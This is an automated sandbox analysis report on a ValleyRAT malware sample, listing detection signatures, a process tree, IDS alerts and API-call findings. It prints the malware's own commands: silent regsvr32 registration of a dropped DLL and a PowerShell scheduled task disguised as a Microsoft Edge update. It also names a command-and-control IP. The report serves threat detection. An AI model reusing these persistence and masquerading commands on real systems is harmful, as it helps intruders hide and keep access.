Windows Analysis Report
eXIHsSYhOX.exe

Overview

General Information

Sample name: eXIHsSYhOX.exe (renamed because original name is a hash value)
Original sample name: 9170086e8d746e094ab4fe7444613030.exe
Analysis ID: 1583995
MD5: 9170086e8d746e094ab4fe7444613030
SHA1: b8afef741c151864c6bffc41a82824e0f51c0b97
SHA256: 982c53771e2f23b29141062b5e2a90bf1588ce4a2dbb559031e7758bd192c8eb
Tags: exe, ValleyRAT, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Contains functionality to inject code into remote processes
Loading BitLocker PowerShell Module
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Suspicious powershell command line found
Uses Register-ScheduledTask to add task schedules
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • eXIHsSYhOX.exe (PID: 7776 cmdline: "C:\Users\user\Desktop\eXIHsSYhOX.exe" MD5: 9170086E8D746E094AB4FE7444613030)
    • eXIHsSYhOX.tmp (PID: 7792 cmdline: "C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp" /SL5="$2048C,1548946,795136,C:\Users\user\Desktop\eXIHsSYhOX.exe" MD5: E97363B64F37EE24CDD55CEA14D1C564)
      • cmd.exe (PID: 7824 cmdline: "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 7876 cmdline: timeout /T 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • eXIHsSYhOX.exe (PID: 7948 cmdline: "C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: 9170086E8D746E094AB4FE7444613030)
          • eXIHsSYhOX.tmp (PID: 7968 cmdline: "C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp" /SL5="$304E8,1548946,795136,C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: E97363B64F37EE24CDD55CEA14D1C564)
            • regsvr32.exe (PID: 7988 cmdline: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
              • powershell.exe (PID: 8120 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 7380 cmdline: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{2F534156-472A-43D2-9350-94580B483BA3}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • regsvr32.exe (PID: 3128 cmdline: C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • regsvr32.exe (PID: 4900 cmdline: /S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • powershell.exe (PID: 7436 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source: 00000007.00000002.2917895885.000000000429F000.00000004.00000020.00020000.00000000.sdmp | Matched rule: Windows_Trojan_Donutloader_f40e3759 | Description: unknown | Author: unknown | Strings:
  • 0x2e0:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x3816:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Source: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp | Matched rule: Windows_Trojan_Donutloader_f40e3759 | Description: unknown | Author: unknown | Strings:
  • 0x1cb50:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x20086:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Source: 7.2.regsvr32.exe.4f812d5.1.raw.unpack | Matched rule: Windows_Trojan_Donutloader_f40e3759 | Description: unknown | Author: unknown | Strings:
  • 0x1b87b:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x1edb1:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

System Summary

Source: Process started | Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll", ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7988, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }", ProcessId: 8120, ProcessName: powershell.exe
Source: Network Connection | Author: Dmitriy Lifanov, oscd.community
Data: DestinationIp: 103.97.176.69, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 7988, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
Source: Process started | Author: Florian Roth (Nextron Systems)
Data: Command: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll", CommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp" /SL5="$304E8,1548946,795136,C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES, ParentImage: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp, ParentProcessId: 7968, ParentProcessName: eXIHsSYhOX.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll", ProcessId: 7988, ProcessName: regsvr32.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll", ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7988, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }", ProcessId: 8120, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security
Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll", ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7988, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }", ProcessId: 8120, ProcessName: powershell.exe

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-04T01:22:28.745998+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 103.97.176.69 | 443 | TCP
2025-01-04T01:23:33.528707+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 53307 | 103.97.176.69 | 443 | TCP

AV Detection

Source: C:\Users\user\AppData\Roaming\BurlySparrow.dll (copy) | ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\is-SF7GG.tmp | ReversingLabs: Detection: 65%
Source: eXIHsSYhOX.exe | Virustotal: Detection: 52%
Source: eXIHsSYhOX.exe | ReversingLabs: Detection: 44%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.3% probability
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function 7_2_6C8ADE90: BCryptGenRandom, SystemFunction036
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function 14_2_6C8ADE90: BCryptGenRandom, SystemFunction036
Source: eXIHsSYhOX.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\File_is1
Source: eXIHsSYhOX.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function 7_2_6C870400: NetUserEnum, NetUserGetInfo, memcpy, NetApiBufferFree, NetApiBufferFree, NetApiBufferFree, LsaEnumerateLogonSessions, LsaFreeReturnBuffer, LsaGetLogonSessionData, memcmp, LsaFreeReturnBuffer, LsaFreeReturnBuffer, LsaFreeReturnBuffer, NetApiBufferFree, NetApiBufferFree
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function 14_2_6C870400: NetUserEnum, NetUserGetInfo, memcpy, NetApiBufferFree, NetApiBufferFree, NetApiBufferFree, LsaEnumerateLogonSessions, LsaFreeReturnBuffer, LsaGetLogonSessionData, memcmp, LsaFreeReturnBuffer, LsaFreeReturnBuffer, LsaFreeReturnBuffer, NetApiBufferFree, NetApiBufferFree
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function 7_2_6C85C720: 4x nop then push ebp
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function 14_2_6C85C720: 4x nop then push ebp

Networking

Source: Network traffic | Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49736 -> 103.97.176.69:443
Source: Network traffic | Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:53307 -> 103.97.176.69:443
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 103.97.176.69 443
Source: global traffic | TCP traffic: 192.168.2.4:53046 -> 162.159.36.2:53
Source: Joe Sandbox View | ASN Name: ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK
Source: unknown | DNS traffic detected: query: 18.31.95.13.in-addr.arpa reply code: Name error (3)
Source: unknown | TCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function 7_2_02632FB0: select, recv
Source: global traffic | DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: powershell.exe, 0000000A.00000002.1868255401.0000000006C70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1978277897.0000000003387000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: regsvr32.exe, 00000007.00000003.1775901750.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889000583.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1759503664.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1756577607.0000000004189000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1774948229.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917563598.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1888311741.0000000004190000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1758105092.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1750414268.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1772234354.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1751777281.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1758205297.000000000418C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1774741083.0000000004190000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1749875575.0000000004191000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.micro
Source: regsvr32.exe, 00000007.00000003.1775901750.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889000583.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1759503664.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1756577607.0000000004189000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1774948229.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917563598.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1888311741.0000000004190000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1758105092.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1750414268.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1772234354.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1751777281.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1758205297.000000000418C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1774741083.0000000004190000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1749875575.0000000004191000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.c
Source: powershell.exe, 00000008.00000002.1818056644.0000000005DED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1862302004.00000000050BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2001806142.000000000623C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1809903757.0000000004ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1852228572.0000000004184000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000008.00000002.1809903757.0000000004D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1852228572.0000000004051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1982918321.00000000051D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1809903757.0000000004ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1852228572.0000000004184000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.1809903757.0000000004D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1852228572.0000000004051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1982918321.00000000051D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000011.00000002.2001806142.000000000623C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.2001806142.000000000623C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.2001806142.000000000623C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: regsvr32.exe, regsvr32.exe, 0000000E.00000002.2029086598.000000006C955000.00000002.00000001.01000000.00000007.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: eXIHsSYhOX.exe | String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: powershell.exe, 00000008.00000002.1818056644.0000000005DED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1862302004.00000000050BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2001806142.000000000623C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: eXIHsSYhOX.exe, 00000000.00000003.1660219416.00000000034D0000.00000004.00001000.00020000.00000000.sdmp, eXIHsSYhOX.exe, 00000000.00000003.1660568722.000000007F0BB000.00000004.00001000.00020000.00000000.sdmp, eXIHsSYhOX.tmp, 00000001.00000000.1662025483.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, eXIHsSYhOX.tmp, 00000006.00000000.1692249801.0000000000DDD000.00000020.00000001.01000000.00000006.sdmp, eXIHsSYhOX.tmp.0.dr | String found in binary or memory: https://www.innosetup.com/
Source: eXIHsSYhOX.exe, 00000000.00000003.1660219416.00000000034D0000.00000004.00001000.00020000.00000000.sdmp, eXIHsSYhOX.exe, 00000000.00000003.1660568722.000000007F0BB000.00000004.00001000.00020000.00000000.sdmp, eXIHsSYhOX.tmp, 00000001.00000000.1662025483.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, eXIHsSYhOX.tmp, 00000006.00000000.1692249801.0000000000DDD000.00000020.00000001.01000000.00000006.sdmp, eXIHsSYhOX.tmp.0.dr | String found in binary or memory: https://www.remobjects.com/ps

System Summary

Source: 7.2.regsvr32.exe.4f812d5.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000007.00000002.2917895885.000000000429F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C874C20 GetProcessTimes,GetSystemTimes,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,memcpy,ReadProcessMemory,ReadProcessMemory,VirtualQueryEx,memset,GetModuleFileNameExW,K32GetModuleFileNameExW
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C876890 NtQueryInformationProcess,NtQueryInformationProcess
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C856300 memset,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,AddVectoredExceptionHandler,RtlAddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,NtGetContextThread,NtTraceControl,NtSetContextThread,NtClose
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C8F0790 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,GetConsoleMode,GetFileType,memset,GetFileInformationByHandleEx
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_04FA189C NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C874C20 GetProcessTimes,GetSystemTimes,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,memcpy,ReadProcessMemory,ReadProcessMemory,VirtualQueryEx,memset,GetModuleFileNameExW,K32GetModuleFileNameExW
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C876890 NtQueryInformationProcess,NtQueryInformationProcess
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C8F0790 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,GetConsoleMode,GetFileType,memset,GetFileInformationByHandleEx
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 14_2_6C856300 memset,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,NtGetContextThread,NtSetContextThread,NtClose
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C8F3C94
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C855C30
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C8F26D0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C8543E0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C856300
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C89DCB0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C85ECF0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C872D80
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C926DC0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C896D50
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C880E80
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C89EE00
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C934E20
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C8A7F80
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C8C9FC0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C85EFD0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C8EC8C0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C9328C0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C8808D0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C8598E0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C8E983E
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C896830
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C87E870
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C942994
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C9279B0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C9469D0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C944A90
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C871AF0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C873A40
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C85EA60
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 7_2_6C873410
